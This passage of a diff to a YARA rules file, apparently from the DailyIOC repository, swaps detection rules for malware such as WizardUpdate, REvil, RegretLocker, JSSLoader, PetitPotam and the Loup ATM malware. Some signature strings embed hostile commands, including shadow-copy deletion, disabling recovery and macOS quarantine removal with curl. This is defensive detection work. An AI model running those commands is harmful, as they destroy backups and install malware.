-		reference = "https://twitter.com/Arkbird_SOLG/status/1272674621381361672"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-07/NK_Rivts_Feb_2009_1.yar#L3-L22"
+		id = "3e48c2fa-10f4-5152-90e6-f5f8cc507103"
+		date = "2021-10-22"
+		modified = "2021-10-23"
+		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_2.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "aab3e8067933cbaef2725b5db9e744df2e2be0a89aaf7ce85df79c5f45d72d8f"
+		logic_hash = "99d3323e3c155be040fef3beea0a55aec9bd3178df822d5fd6530864186446ed"
 		score = 75
 		quality = 67
 		tags = "FILE"
-		hash1 = "244885b47ec2157a8ea9278bec3ea1883f45d97b1fcb78d4fa875bef0f329a97"
+		hash1 = "eafacc44666901a5ea3c81a128e5dd88d0968a400d74ef1da5c2c05dc6dd7a39"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = "F:\\meWork\\ksj\\Test\\testVir-ga\\testvir_non\\Debug\\testvir_non.pdb" fullword ascii
-		$s2 = "\\\\.\\pipe\\TESTVIR1PIPE" fullword ascii
-		$s3 = "\\system32\\Hana80.exe" fullword ascii
-		$s4 = "\\system32\\nnr60.exe" fullword ascii
-		$s5 = { 54 45 53 54 56 49 52 31 5f 45 56 45 4e 54 5f 4f 42 4a }
-		$s6 = "INFECT" fullword ascii
-		$s7 = { 54 45 53 54 5f 5f 5f 41 43 43 45 53 53 5f 44 49 52 }
-		$s8 = { 2e 70 69 66 }
-		$s9 = { 2f 2f 2f 2f 44 41 45 4d 4f 4e }
+		$s1 = { 24 28 65 76 61 6c 20 65 63 68 6f 20 7e 24 28 65 63 68 6f 20 24 55 53 45 52 29 29 }
+		$s2 = { 69 66 20 5b 20 21 20 2d 66 20 22 24 [5-15] 22 20 5d 3b 20 74 68 65 6e }
+		$s3 = { 63 75 72 6c 20 2d 2d 72 65 74 72 79 20 [2-3] 2d 66 20 22 }
+		$s4 = { 78 61 74 74 72 20 2d 72 20 2d 64 20 63 6f 6d 2e 61 70 70 6c 65 2e 71 75 61 72 61 6e 74 69 6e 65 }
+		$s5 = { 6c 61 75 6e 63 68 63 74 6c 20 6c 6f 61 64 20 2d 77 }
+		$s6 = { 63 68 6f 77 6e 20 2d 52 20 24 55 53 45 52 }
+		$s7 = { 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 20 65 6e 63 6f 64 69 6e 67 3d 5c 22 55 54 46 2d 38 5c 22 3f 3e 0a 09 3c 21 44 4f 43 54 59 50 45 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 5c 22 2d 2f 2f 41 70 70 6c 65 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f 2f 45 4e 5c 22 20 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 70 6c 65 2e 63 6f 6d 2f 44 54 44 73 2f 50 72 6f 70 65 72 74 79 4c 69 73 74 2d 31 2e 30 2e 64 74 64 5c 22 3e 0a 09 3c 70 6c 69 73 74 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 3e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
+		filesize > 2KB and 6 of ( $s* )
 }
-
-rule ARKBIRD_SOLG_Mal_ATM_Loup_Aug_2020_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_1647_Apr_2021_1 : CVE_2021_1647 FILE
 {
 	meta:
-		description = "Detect ATM malware Loup by theirs strings."
+		description = "Detect CVE-2021-1647 tool "
 		author = "Arkbird_SOLG"
-		id = "07c0fe02-a82a-58a7-8776-748a1c986f93"
-		date = "2020-08-17"
-		modified = "2020-08-18"
-		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-17/Loup/Mal_ATM_Loup_Aug_2020_1.yar#L3-L34"
+		id = "c4c14d22-adf8-51b1-b898-7e253447824f"
+		date = "2021-05-04"
+		modified = "2021-05-05"
+		reference = "-"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-04/CVE-2021-1647/EXP_CVE_2021_1647_Apr_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "18e4d6af5d89746b42c87d7311e442f61deff3bfcbf57cc008d87290e91baafb"
+		logic_hash = "58f16973f68b1b792f6f1575b6a3f386493d033767ee97e48a33044e3ddc3426"
 		score = 75
-		quality = 67
-		tags = "FILE"
-		hash1 = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
+		quality = 75
+		tags = "CVE-2021-1647, FILE"
+		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
+		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
+		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
+		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
+		tlp = "Green"
+		adversary = "-"
 
 	strings:
-		$pdb1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" fullword ascii
-		$pdb2 = "PDBOpenValidate5" fullword ascii
-		$dbg1 = "Run-Time Check Failure #%d - %s" fullword ascii
-		$dbg2 = "Unknown Filename" fullword ascii
-		$dbg3 = "Unknown Module Name" fullword ascii
-		$info1 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
-		$info2 = { 41 64 64 72 65 73 73 3a 20 30 78 }
-		$info3 = { 53 69 7a 65 3a }
-		$info4 = { 44 61 74 61 3a }
-		$s1 = "MSXFS.dll" fullword ascii
-		$s2 = "WFSExecute" fullword ascii
-		$s3 = "WfsVersion" fullword ascii
-		$s4 = "SvcVersion" fullword ascii
-		$s5 = "SpiVersion" fullword ascii
-		$s6 = "CurrencyDispenser1" fullword ascii
-		$s7 = "WFSUnlock" fullword ascii
-		$s8 = "WFSFreeResult" fullword ascii
-		$s9 = "WFSCleanUp" fullword ascii
-		$s10 = "WFSOpen" fullword ascii
-		$s11 = "WFSClose" fullword ascii
-		$s12 = "WFSStartUp" fullword ascii
+		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
+		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "190fc01f66c40478aa91be89a98c57e9" and ( 1 of ( $pdb* ) and 2 of ( $dbg* ) and 2 of ( $info* ) and 9 of ( $s* ) ) )
+		filesize > 10KB and all of them
 }
-rule ARKBIRD_SOLG_Ran_Regretlocker_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Revil_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect RegretLocker ransomware"
+		description = "Detect the ELF version of REvil ransomware"
 		author = "Arkbird_SOLG"
-		id = "a8d58402-15e2-5d20-8d33-2e7a3f8973fd"
-		date = "2020-11-04"
-		modified = "2020-11-04"
-		reference = "https://twitter.com/VK_Intel/status/1323693700371914753"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-04/RegretLocker/Ran_RegretLocker_Oct_2020_1.yar#L1-L24"
+		id = "b4b9d60e-a352-5045-8be3-e9a08d70ef6b"
+		date = "2021-06-28"
+		modified = "2021-06-29"
+		reference = "https://twitter.com/jaimeblascob/status/1409603887871500288"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-28/REvil/RAN_ELF_REvil_Jun_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "2c63bdcee6f2a9025d3a1f73f3a38ec58da103752b88bd3a6bf79d85d8f92e4d"
+		logic_hash = "054bdb8362fdea2dc914b11387f6c67e35932acb73ba2b133ca29f69549914ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "a188e147ba147455ce5e3a6eb8ac1a46bdd58588de7af53d4ad542c6986491f4"
+		hash1 = "3d375d0ead2b63168de86ca2649360d9dcff75b3e0ffa2cf1e50816ec92b3b7d"
+		hash2 = "d6762eff16452434ac1acc127f082906cc1ae5b0ff026d0d4fe725711db47763"
+		hash3 = "796800face046765bd79f267c56a6c93ee2800b76d7f38ad96e5acb92599fcd4"
+		hash4 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4"
+		tlp = "White"
+		adversary = "RAAS"
 
 	strings:
-		$seq1 = { b8 05 dd 44 00 e8 07 7d 00 00 81 ec b0 06 00 00 53 56 33 db c7 45 cc 07 00 00 00 33 c0 89 5d c8 57 66 89 45 b8 40 c7 85 7c ff ff ff 02 00 00 00 c7 45 e0 ec 4a 98 ec 8d 75 e0 c7 45 e4 f9 a0 e9 47 8d 7d 80 c7 45 e8 90 1f 71 41 c7 45 ec 5a 66 34 5b 89 45 90 89 45 b0 89 45 b4 8d 45 d0 50 a5 8d 45 b0 50 53 68 00 00 3f 00 ff 75 0c a5 8d 85 7c ff ff ff 50 89 5d fc a5 a5 e8 76 50 00 00 85 c0 74 32 ff 15 74 00 45 00 50 68 88 1b 45 00 e8 ab de ff ff 8b 75 08 8d 45 b8 59 59 88 5d f0 8b ce ff 75 f0 89 5e 10 50 89 5e 14 e8 bb 50 ff ff e9 cb 01 00 00 53 8d 45 90 50 53 6a 04 53 ff 75 d0 e8 35 50 00 00 85 c0 74 08 50 68 bc 1b 45 00 eb bd 33 c0 8d bd 4c fb ff ff b9 82 00 00 00 be 04 01 00 00 f3 ab 8d 85 4c fb ff ff 89 75 d4 50 8d 45 d4 83 cb ff 50 ff 75 d0 e8 02 50 00 00 83 65 e8 00 8d 4d d8 33 c0 6a 07 5f 66 89 45 d8 8d 85 4c fb ff ff 50 89 7d ec e8 c6 6d ff ff 6a ff 68 f4 1b 45 00 8d 4d d8 c6 45 fc 01 e8 fd e8 ff ff 83 f8 ff 74 38 83 65 a8 00 33 c9 6a ff 50 8d 45 d8 66 89 4d 98 50 8d 4d 98 89 7d ac e8 3d df ff ff 83 7d ac 08 8d 45 98 0f 43 45 98 50 e8 bc 58 02 00 59 8d 4d 98 8b d8 e8 dd 69 ff ff 56 8d 85 54 fd ff ff 50 ff 15 f0 00 45 00 8b f8 8d 85 54 fd ff ff 50 8d 4d d8 e8 57 6d ff ff 8b 4d ec 8d 45 d8 8b 55 d8 83 f9 08 8b 75 e8 0f 43 c2 66 83 7c 70 fe 5c 75 16 83 f9 08 8d 45 d8 0f 43 c2 33 c9 66 89 4c 70 fe 8b 4d ec 8b 55 d8 83 f9 08 8d 45 d8 0f 43 c2 33 c9 51 51 6a 03 51 6a 03 51 50 ff 15 dc 00 45 00 8b f0 83 fe ff 74 7e 33 c9 8d 45 d4 51 50 68 04 01 00 00 8d 85 5c ff ff ff 50 51 51 68 00 00 56 00 56 ff 15 84 01 45 00 39 9d 64 ff ff ff 75 2c 8d 45 d4 50 68 04 01 00 00 8d 85 44 f9 ff ff 50 8d 85 54 fd ff ff 50 ff 15 08 01 45 00 8d 85 44 f9 ff ff 50 8d 4d b8 e8 b1 6c ff ff 56 ff 15 a8 00 45 00 68 04 01 00 00 8d 85 54 fd ff ff 50 57 ff 15 f8 00 45 00 85 c0 0f 85 29 ff ff ff 57 ff 15 fc 00 45 00 8b 75 08 33 c0 88 45 f0 8b ce ff 75 f0 89 46 10 89 46 14 8d 45 b8 50 e8 f3 4e ff ff 8d 4d d8 e8 cb 68 ff ff 8d 4d b8 e8 c3 68 ff ff 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 }
-		$seq2 = { 89 7d e4 e8 d5 a9 ff ff c7 04 24 88 02 00 00 6a 40 ff 15 28 01 45 00 8b f0 c7 45 d4 88 02 00 00 8d 45 d4 89 75 e8 50 56 e8 78 1b 00 00 83 f8 6f 75 17 56 ff 15 2c 01 45 00 ff 75 d4 6a 40 ff 15 28 01 45 00 8b f0 89 45 e8 8d 45 d4 50 56 e8 52 1b 00 00 85 c0 0f 84 }
-		$com1 = "bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures" fullword ascii
-		$com2 = { 63 6d 64 2e 65 78 65 00 20 26 20 00 2f 43 20 70 69 6e 67 20 31 2e 31 2e 31 2e 31 20 2d 6e 20 31 20 2d 77 20 33 30 30 30 20 3e 20 4e 75 6c 20 26 20 44 65 6c 20 2f 66 20 2f 71 20 22 25 73 22 }
-		$com3 = "bcdedit.exe / set{ default } recoveryenabled No" fullword ascii
-		$com4 = "vssadmin.exe Delete Shadows / All / Quiet" fullword ascii
-		$com5 = "schtasks /Create /SC MINUTE /TN " fullword ascii
-		$com6 = "schtasks /Delete /TN " fullword ascii
-		$str1 = { 47 45 54 20 25 73 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 25 73 }
-		$str2 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 25 73 }
-		$str3 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
+		$seq1 = { 55 48 89 e5 48 83 c4 80 bf 04 20 00 00 e8 69 d5 ff ff 48 89 45 f8 ?? 8b 05 [2] 31 00 [0-4] 48 8b 3d [2] 31 00 48 8b 35 [2] 31 00 48 8b 0d [2] 31 00 4c 8b 0d [2] 31 00 4c 8b [2] 13 31 00 48 8b 15 ?? 13 31 00 48 8b 45 f8 4c 89 ?? 24 18 48 89 7c 24 10 48 89 74 24 08 48 89 0c 24 ?? 89 }
+		$seq2 = { 48 89 e5 bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff 8b 05 [2] 20 00 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff }
+		$seq3 = { 48 83 ec 20 c7 45 fc 00 00 00 00 eb 64 8b 45 fc 48 8b 14 c5 48 92 61 00 48 8b 05 ?? bd 20 00 48 89 c6 bf 40 93 61 00 b8 00 00 00 00 e8 ?? 3f ff ff 8b 45 fc 48 8b 04 c5 48 92 61 00 48 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 ?? 3d ff ff be [2] 41 00 bf 40 93 61 00 e8 ?? 3e ff ff 48 89 45 f0 48 8b 45 f0 48 89 c7 e8 ?? 3d ff ff 83 45 fc 01 83 7d fc 00 74 96 48 8b 05 [2] 20 00 48 89 c7 e8 ?? 3c ff ff 48 8b 05 [2] 20 00 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 e8 48 8b 45 e8 48 89 c7 e8 ?? 3d ff ff c9 c3 55 48 89 e5 48 83 ec 20 48 89 7d e8 48 8b 45 e8 48 89 c7 e8 ?? 3c ff ff 89 c2 8b 05 ?? d0 30 00 01 d0 83 c0 01 89 c7 e8 ?? 91 ff ff 48 89 45 f8 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3c ff ff 48 8b 45 f8 48 c7 c1 ff ff ff ff 48 89 c2 b8 00 00 00 00 48 89 d7 f2 ae 48 89 c8 48 f7 d0 48 8d 50 ff 48 8b 45 f8 48 01 d0 66 c7 00 2f 00 48 8b 15 ?? cf 30 00 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3e ff ff 48 8b 45 f8 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 f0 48 83 7d f0 00 }
+		$seq4 = { 48 89 e5 48 83 ec 10 c7 45 fc 58 00 00 00 8b 45 fc 48 8d 55 f0 48 89 c6 bf 00 a5 71 00 e8 [2] 00 00 48 89 05 ?? 0b 31 00 48 8d 45 f0 48 89 c2 be 20 00 00 00 bf c0 a4 71 00 e8 [2] 00 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 b7 fd ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 80 fe ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 ?? 0a 31 00 48 c7 05 ?? 0a 31 00 [2] 41 00 e8 ?? f6 ff ff e8 f1 f7 ff ff b8 01 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and all of ( $seq* ) and 4 of ( $com* ) and 2 of ( $str* )
+		uint32( 0 ) == 0x464c457f and filesize > 50KB and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_Exp_Underminer_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT_C_61_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect Underminer exploit kit"
+		description = "Detect similiar structures used in the APT-C-61 maldocs"
 		author = "Arkbird_SOLG"
-		id = "bd2a6b30-e05a-5f90-8dc2-719c1ba48a61"
-		date = "2021-04-14"
-		modified = "2021-04-15"
-		reference = "https://twitter.com/nao_sec/status/1382358986813415427"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-14/Underminer/Exp_Underminer_Apr_2021_1.yar#L1-L20"
+		id = "48054d32-6613-5a54-b19c-8e9b8f747c14"
+		date = "2021-12-13"
+		modified = "2021-12-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-13/APT_APT_C_61_Dec_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "46dd4d8ba58e79761056d3dd6921530520b0071090bcfc3bfaed7a6804f787b7"
+		logic_hash = "be742a0ebc53f09872d5231cf367bb1e3ae04c1a70ce94610b6597e426eeb389"
 		score = 75
-		quality = 63
+		quality = 69
 		tags = "FILE"
-		hash1 = "172ac73cda6260918510ad2f4481a7fcd90c5a86d47dd880c5bcb3596dd20a7d"
+		hash1 = "2cc0f8a85df2b2b0dd4c6942125bf82e647e9ac7bb91467ac5c480cf5e1dd4ff"
+		hash2 = "193c921f7ab12c0066014ffad37a98ee57ecd5101dae2ddeb5e39200eb704431"
+		hash3 = "4ec021cc3dbb2b0de7313e41063026e3ef4777baf4dec2bdad7cd2d515bf0fe2"
+		tlp = "white"
+		adversary = "APT-C-61"
 
 	strings:
-		$s1 = { 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 22 29 }
-		$s2 = "$version" fullword ascii
-		$s3 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 26 26 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3e 30 }
-		$s4 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 22 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 22 5d }
-		$s5 = { 63 6c 61 73 73 69 64 3d 27 63 6c 73 69 64 3a 44 32 37 43 44 42 36 45 2d 41 45 36 44 2d 31 31 63 66 2d 39 36 42 38 2d 34 34 34 35 35 33 35 34 30 30 30 30 27 }
-		$s6 = { 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 22 }
-		$s7 = { 22 64 61 74 61 22 2c 22 2f 6c 6f 67 6f 2e 73 77 66 22 }
-		$s8 = { 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 30 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 2b 28 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 31 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 }
+		$s1 = { 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 3e 53 45 54 20 [1-4] 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
+		$s2 = { 3c 2f 77 3a 72 3e 3c 77 3a 66 6c 64 53 69 6d 70 6c 65 20 77 3a 69 6e 73 74 72 3d 22 20 20 51 55 4f 54 45 20 20 }
+		$s3 = { 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
+		$s4 = { 3c 77 3a 72 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 44 44 45 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e 3c 2f 77 3a 72 3e }
 
 	condition:
-		filesize > 5KB and 6 of ( $s* )
+		uint16( 0 ) == 0x4b50 and filesize > 20KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Jssloader_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_Exp_Petitpotam_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect JSSLoader malware"
+		description = "Detect PetitPotam exploit (local exploit version)"
 		author = "Arkbird_SOLG"
-		id = "192b1386-f0bc-54e8-9341-84f77f4f07c5"
-		date = "2021-06-04"
-		modified = "2021-06-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-04/FIN7/MAL_JSSLoader_Jun_2021_1.yara#L1-L20"
+		id = "dd23c77d-9929-5130-aad8-2bcc0a7dcbaa"
+		date = "2021-07-23"
+		modified = "2021-07-24"
+		reference = "https://github.com/topotam/PetitPotam"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/PetitPotam/Exp_PetitPotam_July_2021_1.yara#L1-L24"
 		license_url = "N/A"
-		logic_hash = "73942afed6b3471be07be1fba3e7f90ec7f2377a1167aeef70627cd07faa3681"
+		logic_hash = "a33a1dc2a3593063de2b65e01a770ff5c72ad360d88efdca588eacb8817fb91d"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
-		hash1 = "59c6acc8f6771ea6eeb8d8f03832642d87f9aa7eb0c3205398d31ad08e019a9c"
-		hash2 = "2609c6ec5d4fdde28d29c272484da66e0995e529cf302ed46f94c68cd99352e3"
-		hash3 = "ea167f5460c5f920699e276fb0c51f32c862256415c57edb4bda5760a70b9e4d"
-		hash4 = "822457c427a0776b41dd8f3479070e56fdd53ccd0175418d4e7d85065ec7d7d1"
-		tlp = "White"
-		adversary = "FIN7"
+		hash1 = "10cbadc2c82178d3b7bdf96ab39b9e8580ee92c2038728b74d314e506c7a9144"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = { 8b 45 c8 83 78 0c 00 0f 84 ce 00 00 00 8b 45 c8 8b 4d 08 03 48 0c 8b f4 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 bc 83 7d bc 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d 08 03 48 10 89 4d f8 8b 45 c8 8b 4d 08 03 08 89 4d ec 8b 45 ec 3b 45 08 75 06 8b 45 f8 89 45 ec 8b 45 ec 83 38 00 74 6c 8b 45 ec 8b 08 81 e1 00 00 00 }
-		$s2 = { 8b f4 6a 04 68 00 10 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 f8 83 7d f8 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 8b 45 c8 8b 08 51 8b 55 f8 52 e8 [2] 00 00 83 c4 0c 8b f4 8b 45 f8 50 8b fc ff 15 [3] 00 3b fc e8 [2] 00 00 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b f4 6a 04 68 00 10 00 00 68 00 11 00 00 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 ec 83 7d ec 00 75 02 eb 3e 8b 45 c8 8b 48 08 8b 11 89 55 e0 83 7d e0 ff 75 0c c7 85 00 ff ff ff 00 00 00 00 eb 09 8b 45 e0 89 85 00 ff ff ff 8b 8d 00 ff ff ff 8b 55 ec 8b 45 f8 89 04 8a 8b 45 ec 64 a3 2c 00 00 00 5f 5e 5b 81 c4 00 01 00 00 